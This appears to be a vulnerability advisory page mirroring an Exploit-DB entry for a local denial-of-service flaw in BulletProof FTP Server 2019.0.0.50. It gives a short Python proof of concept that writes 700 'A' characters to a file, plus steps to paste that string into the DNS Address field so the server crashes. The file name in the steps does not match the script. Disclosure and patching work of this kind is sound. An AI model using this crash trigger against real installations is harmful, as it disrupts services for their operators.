BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)

vendor:

BulletProof FTP Server

by:

Victor Mondragón

7.8

CVSS

HIGH

Denial of Service

400

CWE

Product Name: BulletProof FTP Server

Affected Version From: 2019.0.0.50

Affected Version To: 2019.0.0.50

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64

2019

BulletProof FTP Server 2019.0.0.50 – ‘DNS Address’ Denial of Service (PoC)

A denial of service vulnerability exists in BulletProof FTP Server 2019.0.0.50 when a maliciously crafted DNS address is supplied. An attacker can exploit this vulnerability by running a python code to generate a maliciously crafted DNS address, copying the content to clipboard, enabling the DNS address in the Firewall settings, and clicking on the Test button. This will cause the application to crash.

Mitigation:

Upgrade to the latest version of BulletProof FTP Server.

Source

Exploit-DB raw data:

#Exploit Title: BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-18
#Vendor Homepage: http://bpftpserver.com/
#Software Link: http://bpftpserver.com/products/bpftpserver/windows/download
#Tested Version: 2019.0.0.50
#Tested on: Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: BulletProof_DNS_Server_2019.0.0.50.py
#2.- Open bullet_storage.txt and copy content to clipboard
#3.- Open BulletProof FTP Server
#4.- Select "Settings" > "Protocols" > "FTP" > "Firewall"
#5.- Enable "DNS Address" and Paste Clipboard
#6.- Click on "Test"
#7.- Crashed

cod = "\x41" * 700

f = open('bullet_dns.txt', 'w')
f.write(cod)
f.close()